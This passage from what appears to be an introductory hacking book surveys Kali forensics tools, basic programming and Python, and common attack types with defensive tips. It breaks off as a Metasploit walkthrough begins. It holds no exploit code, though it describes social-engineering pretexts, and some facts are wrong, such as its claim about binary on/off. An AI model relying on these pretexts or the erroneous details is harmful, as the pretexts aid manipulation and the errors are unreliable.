tasks getting done faster and more efficiently. In addition to the network layer, it also helps in fingerprinting systems in the application layer of the OSI model. This is something that even a tool
like NMAP doesn’t provide.
Forensics Tools
We will now list down and learn tools available in Kali Linux which are used in the Forensics domain.
Binwalk
The Binwalk tool is useful while working on binary image file. It lets you scan through the image file for executable code that may be embedded in the image file. It is a very powerful and useful
tool for users who know what they are doing as it can be used to detect coveted information that is hidden in images of firmware. This can help in uncovering a loophole or a hack that is hidden
in the image file, which is used with the intention to exploit the system.
The Binwalk tool is developed in python and makes use of the libmagic library from python, therefore making it an apt tool for magic signatures that are created for the Unix file system. To
make it even more comfortable for testers in the investigation domain, it contains a database of signatures that are commonly found in firmware around the world.
Bulk-extractor
The bulk-extractor tool is an interesting tool used by investigators who want to fetch specific data from a digital file. The tools helps retrieve URLs, email addresses, credit/debit card numbers,
etc. The tools can be used to scan through files, directories and even images of disks. The best part is that even if the data is corrupted partially or in a compressed format, the tool will still reach
its depth to find the data.
If there is data that you keep finding repeatedly, such as email addresses, URLs, you can create a search pattern for them, which can be displayed in the form of a histogram. It also ends up
creating a list of words that are found in a given set of data that may be used to crack a password for files that have been encrypted.
Chkrootkit
The chkrootkit tool is usually used in a live boot scenario. It is used locally to check the host machine for any rootkits that may be installed on the host. It therefore helps in the hardening of a
system, thus ensuring that the system is not compromised and vulnerable to a hacker.
The chkrootkit tool also has the ability to scan through system binaries for any modifications made to the rootkit, temporary deletion, string replacements, and latest log deletions made. It looks
like a fairly simple tool but the power it possesses can be invaluable to a forensic investigator.
p0f
The p0f tool can help the user know the operating system of a host that is being targeted just by intercepting the transmitted packages and examining them and it does this irrespective of whether
the targeted host is behind a firewall or not. The use of p0f does not lead to any increase in network traffic, no lookup of names, and no probes that may be found to be mysterious. Given all these
features, p0f in the hands of an advanced user, can help detect presence of firewalls, use of NAT devices, and presence of load balancers as well.
pdf-parse r
The pdf-parser tool is used in parsing PDF files to classify elements that are used in the file. The output of the tool on a PDF file will not be a PDF file. One may not recommend it for textbook
cases of PDF parsers but it does help to get the job done. Mostly, its use case is PDF files, which you may suspect of being embedded with scripts in them.
Dumpzilla
The Dumpzilla tool is a tool that is developed in python. The purpose of this tool is to extract all information that may be of interest to forensics from web browsers like Seamonkey, Mozilla
Firefox and Iceweasel.
ddrescue
The ddrescue tool is a savior of a tool. It helps in copying data from one block device such as a hard disc or a CD ROM to another block device. But the reason it is a savior is because it copies
the good parts first to avoid any read errors on the source.
The ddrescue tool’s basic operation is completely automatic which means that once you have started it, you do not need to wait for any prompts like an error, wherein you will need to stop the
program or restart it.
By using the mapfule feature of the tool, data will be recovered in an efficient fashion as it will only read the blocks that are required. You also get the option to stop the ddrescue process at any
time and resume it again later from the same point.
Foremost
Have you ever deleted files on purpose or by mistake and realized that you needed them later? The Foremost tool is there to your rescue. This tool is an open source package which is easy to use
and helps you retrieve data off of disks that may have been formatted. It may not help recover the filename but the will recover the data it held. A magical feature is that even of the directory
information is lost, it can help retrieve data by referencing to the header or footer of the file, making it a fast and reliable tool for data recovery.
An interesting piece of fact is that Foremost was developed by special agents of the US Air Force.
Gallet a
The Galleta tool helps you parse a cookie trail that you have been following and convert it into a spreadsheet format, which can be exported for future reference.
Cookies can be evidence in a case of cyber-crime and it can be a challenging task to understand them in their original format. The Galleta tool comes handy here as it helps in structuring data that
is retrieved from cookie trails, which then can be run through other software for deeper analysis. The inputs for these analysis software need the date to be in a spreadsheet format, which is where
the Galleta tool proves to be very useful.
Volatility
When it comes to memory forensics, Volatility is a very popular tool. Developed in the python language, this tool facilitates the extraction of data from volatile memory such as RAM. It is
compatible with 32 bit and 64 bit architectures of almost all Windows variants and limited flavors of Linux and Android. The tool accepts memory dumps in various formats such as crash dumps,
raw memory dumps, hibernation files, virtual snapshots, etc. The run-time state of the host machine and is independent of the investigation of the host.
Password that are decrypted during run-time are stored in the RAM. Thus by retrieving the details of a password, Volatility comes as a savior for investigation of files that lie on the hard disk and
may be encrypted with a password. This helps in decreasing the overall time that may be required for a particular case to be investigated.
Autopsy
Sleuth Kit is a digital forensics toolkit which is open source and can be used with a wide range of file systems such as FAT, NTFS, EXT2, EXT3(and raw images) to perform analysis that can be
in depth. The graphical interface developed for Sleuth Kit (which is a command line tool) is called Autopsy. Autopsy brags of features such as Hash Filtering, Timeline analysis, File System
analysis and searching for keywords. It is also very versatile as it lets you add other modules to the existing set for extended functionality.
You get the option to launch a fresh new case or use one which already exists when you launch the Autopsy tool.
Xplico
Xplico is a forensic tool, which is open source and is used for network forensics. If you wish to extract data from applications that use the network protocols or Internet, Xplico is the tool for you.
All popular network protocols such as HTTPS, POP, SMTP, IMAP, SIP, UDP, TCP and others are supported by Xplico. It supports both IPv4 and IPv6. An SQLite database is used to store the
output data from the tool.
Chapter 5 : Process of hacking and how attackers cover their traces

A computer, as a standalone piece of hardware, is not an intelligent machine. It is the programs written for the computer that determine what it can and cannot do. This chapter will teach you
some of the basic principles of programming, as well as how to choose a programming language. At the end of the chapter, you will find an exercise that will help you write a program in Python
computer language.
Why You Need to Learn a Programming Language to Hack
Computers operate using a series of switches. These electronic switches are turned on/off in different combinations. This creates the functions of a computer. For a computer to turn a switch on
or off, a computer program sends a message using binary code. Binary code is a series of 0’s and 1’s, with the 0’s meaning on and the 1’s meaning off.
The problem with binary code is that it is incredibly complex. It would take even advanced programmers a long time to interpret the code, let alone alter it to do what they want. This is where a
programming language comes in.
A programming compiler translates pre-determined commands from the programming language into binary code that can be read by the computer.
A Few Considerations (and Key Terms) Concerning Programming Languages
To choose the best program to learn, you should consider what you want to do with your hacking/computer knowledge. Here are some common terms you may come across as you learn about the
different programming languages:
Language Generatio n
Generally speaking, as technology has advanced, so have computer languages. Currently, there are five generations of computer language-
● First generation (1GL) were the most primitive. They were difficult to write, since it was written in binary code (0’s and 1’s).
● Second generation (2GL) are often referred to as assembly languages. It was the first step that allowed programmers to use symbolic names for commands, rather than just binary code.
● Third generation (3GL) was another advancement, with higher level languages like Javascript, Java, C, and C++ being developed. 3GL allowed commands and words to be used in
programming.
● Fourth generation (4GL) is a type of coding similar to human language. This programming is common for database access, with some of the most common being ColdFusion and SQL.
● Fifth generation (5GL) is the most advanced language by far, with its applications for neural networks. Neural networks imitate the inner workings of the human mind and are applied in the
area of artificial intelligence.

Procedure- vs. Object-Oriented Programming

Procedure-oriented programming uses a structured method. The problem (such as your hacking goal) is broken up into separate parts. Each individual part is known as a procedure. A main
program allows the individual procedures to run, but also allows them to work together if needed. Procedure-oriented languages that are commonly used include C, FORTRAN, AND COBOL.
Object-oriented programming allows users to create relationships between different data types, which are called classes. Within the classes, different functions are given to each data type. This
makes programming easier because the different data types can inherit pre-developed characteristics. New data types are easier to form for this reason. Some of the most common object-oriented
language types include Java, C++, and PHP.

Step 1 of Programming: Understanding Visual Basic Languag e

Consider for a moment all the different parts of language that you learned in school. Programming language is similar to the language you speak;
● Modules in programming are like chapters
● Procedures in programming are like paragraphs
● Lines of code in programming are like sentences
Within the lines of code, there are programming elements, including:
● Statements
● Declarations
● Methods
● Operators
● Keywords
Each of these elements work together to write a line of code that the computer can understand. The specific way that words are arranged, as well as the words that are used, depends on which
programming language you choose to use. Most hackers are familiar with at least one, however, many hackers go beyond learning one to expand on their knowledge and abilities.

Step 1: Learning to Write HTML

One of the most basic programs to learn is HyperText Markup Language. You write text and then mark it to be read properly by the computer. Even though it is a web-based code, its simplicity
makes it one of the best places to start in terms of coding. HTML uses basic English words that you are familiar with. It is the simplest language to learn and provides a great foundation to build
future knowledge upon.
Step 2: Learning Python Programming Language
Python is one of the preferred languages of hackers. This introduction will be brief, since it can take an entire book and more to learn a programming language. Python programming language is
incredibly powerful; however, it still manages to remain simple. Its clear syntax is what makes it easy to learn. Beyond that, all you need is the right vocabulary. The good news is that if you look
around online, you can easily learn the right words to use to get the program to do what you want. From here, it is learning how to use the vocabulary to write lines of code. You will get a peek at
writing your first code using Python language at the end of this chapter.
Step 3: Learning Your Choice of Other Languages
Even though Python is one of the preferred programming languages, it is definitely not the only one. There are numerous programming languages and most hackers choose to learn more than
one. This is because each programming language has its limitations and there are times when you will find you cannot hack what you want to with your preferred language. The good news is that
as you learn more languages, it becomes less likely that you will encounter a hacking obstacle you cannot overcome. You should note, however, that this is not an all-inclusive list.
Web Languages
These programming languages are typically used for creating/altering webpages. They are used for simple tasks like controlling how words are displayed, as well as complex ones like retrieving
data. Some of the most common web languages include:
● HTML- HyperText Markup Language is the most commonly used programming language for displaying text on a website. It is static, meaning the content does not change with the
programming functions. Instead of controlling how a page functions, HTML is limited to altering the content the page provides.
● Javascript- This language is used to create interactive, dynamic content. This allows form validation, display of animations, communication, calculators, and more.
● XML- Extensible Markup Language is similar to HTML, but more advanced. It allows programmers to customize tags that program a page, as well as send data between different
organizations and applications.
● Java- Java is used to create applets, which are programs that function inside of another program. Java can be used in software or on webpages, to allow users to read files and interact with the
program.
● PHP- This is one of the most powerful languages. Among its tasks include form validation, access to databases, and encryption of data.

Software Languages
Software languages are used for creating programs that can be executed, from those that only print text on a screen to operating systems with any number of functions. Here are some of the most
common:
● Java- In addition to being a web language, Java works for software. It allows creation of graphical programs, interactive user experiences, and more.
● Visual Basic- VBScript is a language created by Microsoft especially for creating Windows applications. It is a good choice if you do not have the resources for a Unix computer yet.
● C Language- C is applicable to the Unix operating system, which is complex but allows the development of software apps. Its uses include the creation of apps for games, as well as
engineering and business programs.
● C++- C++ programming language is similar to C, as it is a descendent of C programming. It is commonly used for graphical applications. Rather than being procedure-based like C, it is
object-based.

Real World Example: A Guide for Writing Codes and Programs Using Python
Step 1: Downloading and Installing Python and Other Essential Programming Elements
You can install Python by accessing the Python website. You should choose the latest interpreter for your operating system. Python is compatible with Windows, OS X, and Linux. You should
note that if you are running an OS X or Linux system, they likely have Python already installed. Even so, you may want to download an updated program from the Python website, particularly if
your computer setup is more than a few years old.
Even once you have the Python program, you are not yet ready to get started. You will also need to download the Python interpreter. The interpreter is what will translate (as well as send)
information between your text editor and your computer. Finally, you will need a text editor. While pre-installed programs like TextEdit or Notepad will work, it is easier to read and write
programming codes using a job-specific text editor like JEdit, TextWrangler, or Notepad++.
Step 2: Learning the Basics and Writing Your First Program
With an interpreter, you are going to find that a high-level language like Python is easy to use. Still, you can make programming (and later hacking) easier by knowing the basics of the program
and the absolute easiest way to learn those basics is to start programming so start Python and open the Python Interpreter. The code in this section must be attributed to
https://www.stavros.io/tutorials/python/
Properties
Python is a typed language which means that types will be enforced. It is implicitly and dynamically types which means that variables don’t need to be declared. It is case sensitive, so name and
NAME are two separate variables with different meanings. Python is also object-oriented, which means that everything in it is an object.

Getting Hel p
You can always get help in Python, from the interpreter. If for example, you wanted to know how a specific object worked, you would type help (<name of object>) in the interpreter. Other
useful commands are dir (), which will show you the methods of a specified object, and <name of object>. Doc, which shows the documentation string of a specified object.
Syntax
In Python, there are no mandatory termination characters for statements and code blocks must be indented. Any statement that needs to be indented should end with a colon (:) and all comments
begin with #. A comment is basically a note to yourself or to another person about what the code does and can be a single or a multi-line string. We use the = operator to assign a value and we
use == to carry our equality testing. To decrease or increase a value, we use the + or – operators on the right side of the statement; this will work on all types of data, including strings.
Data Type s
Python contains several data types, including tuples, lists, and dictionaries. You can use the sets library for sets, although these are built into later versions of Python. Lists are single dimensional
arrays although you can have lists that contain other lists. A dictionary is an associative array and a tuple is a one-dimensional array that is immutable, i.e. it can’t be changed. An array may be of
any type, so types can be mixed; for example, you can have strings, integers, and other types in one list, tuple or dictionary. The first item in an array is indexed as 0 and negative numbers are
always counted from the end back to the beginning, with -1 being the final item.
3 Array ranges can be accessed using a colon. If you leave the start index without a value, it will be assumed to be the first item, while leaving the end empty, assumes it to be the last item.
Indexing is classed as inclusive-exclusive so if you specified items 3:9, the return would be items 3, which is the fourth item (remember, 0 is the first number) to 8, the ninth item.
String s
Python strings may be enclosed in single or double quotes and you can have one kind of mark inside a string that has the other kind, for example, (“She said ‘Hello’.”) is a valid string. Multiline
strings should be enclosed in triple quotes, either singles (‘’’) or double (“””). To put values into a string, we use a tuple and the modulo (%) operator. Each of the % is replaced with items from
within the tuple, from left to right and dictionary substitutions may be used.
Flow Control Statements
The operators for flow control statements are while, if and for. There isn’t a switch; in its place, you should use if. for is used to enumerate through list members.
Functions
A function is declared with the keyword, def. We set optional arguments in the declaration for the function after the mandatory arguments and this is done through the optional argument being
assigned a value. When we use named arguments, we assign a value to the argument name. Functions may return tuples and lambda functions are ad hoc, made up of one statement. We pass
parameters by reference but some types that are immutable, such as ints, tuples, strings, etc., cannot be changed. The thing passed is the memory location and, when you bind a new object to a
variable, the old one is discarded.
Classes
In Python, there is a small amount of multiple inheritance in a class. We can declare a private variable and method by adding two or more leading underscores and a maximum of one trailing
underscore.
Hacking Techniques & Tactics
Having an understanding of the techniques used by hackers to not only access your information without permission will allow you to gain insight into how this is possible as well as what you are
able to do to protect yourself from the most basic of attacks. Using this knowledge, you are also able to explore further in hacking if you wish to develop your skills and discover additional
knowledge into creating your own programs and software.
Keylogger
A keylogger is a very simple piece of software that is designed to track and record each keystroke made by the user of computer. These keystrokes and sequences are then stored on a log file that
is accessed by the hacker who is able to discern your information such as email ID’s, passwords, banking details, credit card numbers and virtually anything else that you input into your machine
using the keyboard. For this reason, many online banking sites and other highly secure web pages use virtual keyboards and even image identifying passcodes to provide you with access to your
account since these cannot be recorded through keyloggers.
How do you keyloggers gain access to your computer in the first place? These lines of code or software are often attached to files that are downloaded onto your computer without you being
aware, known as Trojans (deriving from the Greek mythology of the Trojan Horse). These files then get to work are report back to the hacker with the information collecting from your computer.
Other ways that these files are able to access your computer is if they are placed on the computer either through direct access, if someone was to have access to your computer with permission to
allow them to place the file on the computer or through USB drives that they have provided to you with hidden files rooted within.
Keyloggers may also find themselves used in white hat purposes such as within organizations to ensure that employees are following the correct policies and procedures and not engaging in
deceptive conduct.
Denial of Service (DoS/DDoS)
One of the most common forms of hacking attacks is the Denial of Service, as we had mentioned earlier. This involves causing a website to become unusable. The site is taken down due to the
flooding of information and traffic, enough to overload the system as it struggles to process all the requests and is ultimately overwhelmed and crashes. These attacks are employed by hackers
who aim to disrupt websites or servers that they want to cause destruction to for whatever their reason or motivation was. For example, a hacktivist hacker might take down a website that
disagrees with their political views seeing it as their moral duty. Whereas a black hat hacker might take down the website of a competing organization to disrupt their services and sabotage the
efforts of their competitor.
A DoS attack is carried out using tools such as botnets or a network of infected systems which are then used almost as an army of zombified servers to repeatedly attack the target service,
overloading it. These infected systems are created through emails and software which carry a virus and once infected, these zombie computers are able to be used at will by the hackers. It has
been revealed through industry data that up to 45% of organizations suffer from DDoS attacks resulting in millions of dollars worth of damage each year.
Vulnerability Scanner
To detect weaknesses within a computer network, hackers use a tool known as vulnerability scanner. This could also refer to port scanners which are used to scan a specific computer for
available access points that the hacker would be able to take advantage of. The port scanner is also able to determine what programs or processes are running on that particular port which allows
hackers to gain other useful information. Firewalls have been created to prevent unauthorised access to these ports however this is more of a harm reduction strategy rather than a sure-fire way to
prevent hackers.
Some hackers are able to discern access points manually rather than using a program. This involves reading the code of a computer system and testing weaknesses to see if they are able to obtain
access. They can also employ methods of reverse engineering the program to recreate the code if they are unable to view the code.
Brute Force Attack
If you have ever wondered why you have a limited number chances to enter your password before being denied access, the server you are attempting to access has a safeguard against brute force
attack. Brute force attack involves software that attempts to recreate the password by scanning through a dictionary or random word generator in an extremely short amount of time to hit on the
password and gain access. For this reason, passwords have advanced to become far longer and more complex than they once were in the past, such as including characters, numbers, upper and
lower-case letters and some going as far as barring words that are found in the dictionary.
Waterhole Attacks
Waterhole attacks are known by this name due to the fact hackers prey on physical locations where a high number of people will access their computers and exchange secure information. Similar
in a way that a waterhole can be poisoned for the wildlife surrounding, the hacker can poison a physical access point to claim a victim. For example, a hacker may use a physical point such as a
coffee shop, coworking space or a public Wi-Fi access point. These hackers are then able to track your activity, websites frequented and the times that you will be accessing your information and
strategically redirect your path to a false webpage that allows the information to be sent through to the hacker and allow them to use it at a later time at their leisure. Be sure that when you are
using public Wi-Fi, you have appropriate anti spyware and antivirus software to alert you when there may be suspicious activity while online.
False WAP
Similarly, to the waterhole attack, the hacker can create, using software, a fake wireless access point. The WAP is connected to the official public wireless access point however once the victim
connects they are exposed and vulnerable in that their data can be accessed at any point and stolen. When in public spaces, ensure that the WAP you are using is the correct one, they will
generally have a password prior to access or a portal which will require you to enter a username, email address and password which is obtained from the administer. If you find the access point is
completely open, this could be a cause for alarm knowing that this point is likely bait.
Phishing
Another common technique used by hackers to obtain secure information from an unsuspecting victim is through phishing. Phishing involves a hacker creating a link that you would normally
associate with a site that you commonly access such as a banking site or payment portal. However, when you input your details, they are sent to the hacker rather than the institution that you you
believe you are sending them to. Phishing is often times done through sending false emails that appear as though they are from your bank or billing institution and generally request that you
access your account to either update your details or make a payment.
There are ways to distinguish whether you are being targeted for phishing such as checking the sender's ID (which can still be falsified) or checking the details of the link that you have been
provided and seeing that it doesn’t match up with the usual site that you fill your details in. You may also notice formatting issues with the email such as logos out of place or poor formatting that
would indicate that the phisher is not using the correct template. Many institutions will insist that they would not request your details through email or ask you to update your details and if you do
receive your bill through email, if you feel suspicious you can check with previous billing emails or even call your institution to double check that the email is genuine.
Clickjacking Attacks
If you have ever attempted to stream a video on a less reputable site, you may have noticed that the interface can be quite confusing to navigate due to false play buttons or common sections after
which you click on them and are then redirected somewhere else. These are known as Clickjacking attacks as well as UI Redress. While redirecting to the ad or another page may seem harmless,
when done correctly these attacks can be quite sinister and potentially dangerous as they are able to capture your information. You need to exercise extra caution when using unfamiliar websites
as they may not be as safe as they appear, with their interface taking you to a place right where the hacker wants you. Always be aware of the URL of each click you make and if it differs
drastically from the website that you were just on, ensure that where you are taken does not involve any downloads or exchanging of details for your own protection.
Bait and Switch
The bait and switch technique involves the hacker supplying you with a program that appears to be authentic but when it faces it is a virus or a tool used by the hacker to access your computer.
These can generally be found in unscrupulous websites that offer pirated programs, software, movies or games that are in high demand. Once you download the program, you will find that the
file is not what you had intended and instead had loaded a virus to your computer to provide the hacker with access.
Social Engineering
We mentioned earlier, the social engineering techniques used by white hat hackers. This technique is often overlooked as a means of hacking however it can be quite effective. An example of
social engineering is conning a system administrator into supplying details by posing as a user or an individual with legitimate access. These hackers are often thought of as con men rather than
what we understand to be hackers, however it is a means of hacking nonetheless. Many of these hackers have a good understanding of the security practices of the organization in which they are
attacking. They may not be as experienced or with a lower level security clearance than some of the higher ups. For example, they may phone up the employee on the helpdesk and request access
to the system and without the experience to understand the consequences of providing information to an unknown source, give it up. There are a number of categories that social engineering can
be placed in, these being:
Intimidation - An example of intimidation would involve a superior such as a manager or supervisor calling the help desk technician, angry and threatening to punish the technician if their
authority is questioned. Under pressure, the employee will comply and provide the information. Their questioning of the authority is promptly shut down as the employee values their job and
offers to assist the hacker in securing the information.
Helpfulness - On the opposite end of the spectrum, there is the helpfulness technique. This involves feigning distress and concern to take advantage of a technician's nature to offer help and
compassion. Rather than acting angry and placing pressure on the technician, the distressed hacker will act as though they themselves are under pressure and worrisome of the outcome. The
technician will provide assistance in any way they can regardless of considering the consequences at the risk of causing further distress to the hacker.
Name-dropping - Having the name of an authorised user provides the hacker with the advantage that they can pretend to be a specific person who should rightly have access to the information.
This can be done by sourcing through web pages of companies which can be easily found online. Another example of this is the searching through documents that have been improperly
discarded, providing vital details to the hacker.
Technical - The other area of social engineering hacking is using technology as a means of support to obtain information. This can involve a hacker sending a fax or an email to a legitimate user
which requires the user to respond with sensitive information. The hacker often poses as law information or a legal representative, requiring the information as part of an ongoing investigation for
their files.
Rootki t
A rootkit finds its way onto your operating system through legitimate processes, using low-level and hard to detect program. The rootkit can assume control of the operating system from the user
and since the program itself is hidden within the system binaries as replacement pieces of code, it can be incredibly difficult and virtually impossible for the user to detect and remove the program
manually.
Packet Analyser
When transmitting data across the internet or any other network, an application known as a packet analyser or packet sniffer can be used by a hacker to capture data packets which may contain
critical information such as passwords and other records.
Chapter 6 : Basics of cyber security

As computing technology advances, so too does the risk of cyber terrorism on not only personal networks but also of government institutions, banking and security organizations, in which the
damage can be quite widespread. Cyberterrorism is largely different from aforementioned cybercrime as the nature of cyber terrorism is more to inflict fear and devastation upon a network and
it’s the institution it is contained within.
Cyberterrorism can be conducted in order to reach some kind of personal objective through the use of computer networks and the internet with some experienced cyberterrorists being able to
cause mass damage towards government systems, hospital records as well as national military and security programs that leave a country in a state of turmoil, terrified of further attacks. The
objective for many cyberterrorists is often related to political or ideological agendas.
Cyberterrorism can be challenging to prevent or protect systems from as it can be largely anonymous with unknown motivations and uncertainty over whether there could be repeated attacks
again in the future. There is some argument over the exact definitions of cyber terrorism or whether it should be referred to as terrorism at all since the actions are not closely linked with
conventional methods of terrorism and instead are towards information warfare, however since many of the motives are political in nature and targeted towards the disruption of infrastructure, the
term loosely fits into the category of terrorism.
Cyberterrorism can be committed by individuals, groups and organizations and in some cases by nation states attacking rival governments. Cyberterrorism is currently a major concern for both
government and media sources due to the potential damages with government agencies such as the Federal Bureau of Investigations (FBI) and the Central Intelligence Agency establish targeted
strike forces to reduce the damage caused by cyber terrorism.
Cyberterrorism can be accomplished through a variety of techniques such as a network penetration and viruses that are created in order to disrupt and immobilize the system. Cyberterrorism is
more dangerous than simple cybercrime for personal gain. Cyberterrorism can have serious consequences on the country and institutions that are attacked, placing lives at risk. As our technology
improves, there are a number of ways to combat cyberterrorism by first anticipating and preparing for attacks and to implement a plan for prevention, following this we prepare for incident
management to mitigate an attack limit the damage caused in the case that an attack has reached the target. Once an attack has occurred, the next stage of defence is to implement consequence
management which is assessing the damage and taking note of how we are able to improve defences in the future, starting the process over once again.
Traits of Cyber Terrorism
After understanding the definition of cyber terrorism, many cyber terrorists have found to have very similar traits in common which can place them in the category of cyber terrorists. One such
trait is that the victims of cyber terrorist attacks are specifically targeted rather than random in the case of hackers without clear objectives other than financial gain or entertainment. While there
can be randomised cases of hackers releasing viruses or worms into the general public, there are often clear objectives for doing so with the victims being a specific group or nation that has been
targeted for predetermined reasons by the hacker. Other objectives involve attacking an organization, industry, sector or economy for the purpose of inflicting damage or destroying their target.
Finally, another common trait within cyber terrorism is to further the terrorist group's own goals which could be financial, political, religious or ideological. These terrorists seek to achieve this
goal by inflicting heavy damages on their target and make their own objectives obvious by publicising them.
Types of Cyber Terrorism Attack
Cyberterrorism has been placed within three main categories by the Centre for the Study of Terrorism and Irregular Warfare at the Naval Postgraduate school in Monterey, California. These
categories are simple-unstructured, advanced-structured and complex-coordinated.
Simple-Unstructured - These are small-scale attacks and are generally performed by inexperienced hackers using widely available tools created by other people. The hackers behind these kinds of
attacks generally lack command and control skills as well as possessing a limited learning capability.
Advanced-Structured - These types of attacks are more sophisticated and can target multiple systems or networks and the hackers responsible possess the capability to modify or even create basic
hacking tools. While the hackers possess limited command and control skills, they have an increase learning capability and present a significant risk depending on the organization they are
targeting.
Complex-Coordinated - At the higher end of the scale, coordinated and complex attacks can have a devastating effect on the system under attack with mass disruptions against integrated and
heterogeneous defences. These types of hackers have the ability to create sophisticated hacking tools and have a strong command and control as well as an advanced capacity for further learning
and skill development.
Each of these sophistication and devastation and largely depend on the motivation and objectives of the hackers. Understanding each type of attack allows organizations to develop the proper
counter measures to combat and prevent an attack as well as implement damage control in the wake of an attack.
Incursion - The objective of an incursion attack is to gain access or penetrate the networks and systems which contain valuable information for the attacks. This is one of the more common
attacks and has a much greater success rates for the terrorists. Due to the high number of loopholes available to hackers, terrorists are able to take advantage of weak security and vulnerabilities to
obtain or even modify secure information which can then be recycled for further attacks against the organization or for the personal gain of the attackers.
Destruction - This is a far more severe attack with the objective to infiltrate a computer system and inflict damage and ultimately destroy the network. For the organizations who are victim to
these types of attacks, there can be incredible costs involved both in terms of repair and loss of revenue. An attacker intent on destruction can render an organization inoperable with their entire
system thrown into disarray, impacting them financially and in some cases destroying their reputation as clients fear the security of their information following a serious attack. In terms of
governments, a destruction attack can plunge the systems into chaos. It can take some amount of time for an organization to recover fully from the most severe destruction attack, as is the
objective for the hacker.
Disinformation - Equally devastating can be that of disinformation. This involved spreading credibility destroying rumours and information, having a severe impact on the target. The rumours
that are launched may or may not be true however they can be equally devastating and can still have long term effects on the organization or nation involved. Once these attacks are carried out,
damage control can be quite challenging as information can spread regardless of whether the infiltration is contained. Information can relate to certain scandals and claims of corruption which
can tarnish the reputation of individuals within the organization or the organization itself, leading to disruption of the order that has held the organization together.
Denial of Service - We have mentioned denial of service earlier in this book as it one of the most common and widely known forms of attack. In terms of cyberterrorism, DoS attacks occur with
businesses and entities that have an online presence with the attack rendering the website or service useless at the time of the attack. These types of attacks can therefore cause immense issues in
both the social and economic function of the business, causing organizations to suffer massive losses.
Defacement of Web Sites - While not as severe or damage, the defacement of a website can still have immense consequences for a business. Defacement of websites can involve websites to be
changed completely, including a message from cyber terrorists for either propaganda or publicity purposes for them to achieve some type of cause. In other cases, hackers may cause the website
to redirect to one in which they have established earlier which could also contain a message that they have devised to gain publicity and awareness of their propaganda or cause. These types of
attacks have decreased in recent years as security measures have been heightened and hackers have a lower probability of access to web pages long enough to implement the changes and most
major organizations effectively putting a stop to it.
Strategies to Combat Cyber Terrorist Threats
Implement strategic plans to counter cyber terrorist efforts will ensure that your organization has the means to combat any threats it may face. There are a number of strategies which a business
can employee or in order to stay ahead and heighten their security capabilities in the face of a threat. These are:
Prosecuting Perpetrators
Many attacks can behind the wall of anonymity with many smaller organizations failing to pursue and prosecute the hackers responsible. While this can be a costly activity, there are some
advantages in identifying and taking the attackers to court. This can be a shock to the cyber terrorist community and set the standard for which other organizations should conduct themselves in
the wake of an attack. If the case is particularly high profile, the organization can benefit from the hard-line response with the prosecuted hackers being an example to the rest of the criminal
organizations that are determined to wreak havoc on your business. This example set can send waves throughout the rest of the community and can lead to improvements in the investigation and
prosecution process of criminal cyber terrorists. Therefore, is always in the best interest of the parties that have been affected by an attack to seek justice.
Develop New Security Practices
As an organization faces an attack, they will follow through in revaluating their security and any potential loopholes that could be exploited. This involves further testing such as the pen-testing
we explored earlier as a means of finding weaknesses and vulnerabilities and employing new security means to combat these. These activities require cooperation and coordinated efforts amongst
all departments within an organization to ensure maximum effectiveness. Corporations should review international standard guidelines for security information to detail the steps that should be
taken in order to secure organizations in terms of information security. As organizations further develop their security capabilities, they are able to adapt and modify the standard guidelines to
comply with their own operations and needs to achieve the best results.
Take a Proactive Approach
It is important for both corporations and the general public to take a proactive approach as the threat from cyber terrorism becomes more sophisticated and targeted. This involves keeping up to
date with the latest information within the cyber security sphere such as threats, vulnerabilities and noteworthy incidents as they will allow security professionals to gain a deeper insight into how
these components could affect their organizations. From there they are able to develop and implement stronger security measures thereby reducing the opportunities for hackers to exploit for
cyber-attacks.
Organizations should constantly be on the forefront of cyber security having a multi-level security infrastructure in order to protect valuable data and user’s private information. All activities that
are critical in nature should have security audits frequently to ensure all policies and procedures relating to security are adhered to. Security should be treated as an ongoing and continuous
process rather than an aftermath of the consequences of an attack.
Deploy Vital Security Applications
There are many tools available for security professionals to protect their networks and they can provide a significant benefit to the job at hand. These applications involve firewalls, IDS, as well
as anti-virus software that can ensure better protections against potential hackers. Using these security systems, security personnel are able to record, monitor and report any suspicious activities
that can indicate the system is at risk. The applications are able to streamline the process, making the job far more efficient and effective. Utilizing these types of tools ensures that security
personnel are assisted with the latest in prevention technology and have a greater probability of combating attackers.
Establish Business Disaster Recovery Plans
In the event that an attack does occur, all businesses should have a worst-case scenario contingency plan in place to ensure that processes and operations are brought back to normally as soon as
possible. Without such plans, the consequences can be disastrous leading to a loss in revenue and reputation on behalf of the business. Once these plans have been devised, they should be
rehearsed regularly in order to test their effectiveness and also provide staff with training in the event of an attack.
These plans should be comprised of two main components, these being, repair and restoration. From the perspective of repair, the attacking force should be neutralised as soon as possible with
the objective to return operations to normalcy and have all functions up and running. The restoration element is geared towards having pre-specified arrangements with hardware, software as well
as a network comprised of service vendors, emergency services and public utilities on hand to assist in the restoration process.
Cooperation with Other Firms
Your organization would not be alone in dealing with the aftermath of a cyber-attack. Many organizations exist in order to deal with cyber terrorism threats both public and private. These groups
can go a long way in helping with issues relating to cyber terrorism such as improving the security within your organization, helping devise and implement disaster recovery plans and further
discuss how you can deal with threats in the future and what this means for the wider community. Having this extended network available to you will enhance your efforts in resisting cyber-
attacks as well as having a role in discussing other emerging threats and protecting organizations facing these same threats.
Increasing Security Awareness
In times where security threats are prevalent and this requires an increase in awareness with all issues relating to cyber security. Having your organization become an authority in raising
awareness within the community will help educate other organizations in how they can defend themselves against attacks and strengthen their own security which in turn will damage the
cyberterrorist community as they face a stronger resistance. You can also raise awareness within your own organization through security training programs which will help all employees equip
themselves with the right skillset to combat threats that could arise through their own negligence and will also help them be more alert in times when threats could be present.
Chapter 7 : Protect yourself from cyber attacks and secure your computer and other devices

Now that you have a good understanding of hacking concepts and what is involved in the penetration of a system as well as how you can turn hacking into a career, we want to get into the heart
of the action and learning how to carry out an effective attack. This is for demonstration purposes to help strengthen your knowledge and ideally stem further education. If you are still unsure on
the basics of hacking, have a read through and study this book thoroughly as we will be going through this step by step guide with the assumption that you have a solid grasp of the topics of
hacking and computer security and we wouldn’t want you to get lost along the way.
Before you do get started, you will need to utilize a tool to help with the pen-test. For this example, we will be using Metasploit, an open source tool which has a number of functions which pen-
testers and black hat hackers alike will find incredibly useful. The tool has a database filled with a large number of known exploits which can be picked up during the vulnerability test by the
variety of scanners. Metasploit is one of the more popular pen-testing software applications and as an open source program, there is a large community which you can interact with in case you
have any questions or concerns.
We will be hacking into a virtual machine as this is a great way to practice and scan for weaknesses without actually breaking into an established machine. We will be scanning our virtual
machine for exploits upon which we will then penetrate the system and extract the information we require. The virtual machine will also have limited access meaning it won’t actually be
